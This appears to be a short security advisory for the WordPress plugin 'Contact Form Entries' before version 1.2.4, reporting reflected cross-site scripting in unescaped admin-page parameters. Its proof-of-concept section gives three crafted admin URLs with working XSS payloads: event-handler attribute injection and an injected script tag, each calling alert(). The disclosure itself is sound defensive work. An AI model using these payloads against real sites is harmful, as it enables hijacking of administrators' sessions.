Contact Form Entries < 1.2.4 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page

PoC

https://example.com/wp-admin/admin.php?page=vxcf_leads&amp;form;_id=cf_5e1kpc"+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)%2F%2F+ne97l&amp;status;&amp;tab;=entries&amp;search;&amp;order;=desc&amp;orderby;=fir+ https://example.com/wp-admin/admin.php?page=vxcf_leads&amp;form;_id=cf_5&amp;status;=&amp;tab;=entries&amp;search;=&amp;order;=asc&amp;orderby;=file-438&amp;field;=&amp;time;=&amp;start;_date=&amp;end;_date=onobw"><script>alert(1)<%2Fscript>z2u4g https://example.com/wp-admin/admin.php?page=vxcf_leads&amp;form;_id=cf_5&amp;status;=&amp;tab;=entries&amp;search;=e67x3"onmouseover%3D"alert(1)"style%3D"position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B"oakfc&amp;order;=asc&amp;orderby;=file-438&amp;field;=&amp;time;=&amp;start;_date=&amp;end;_date=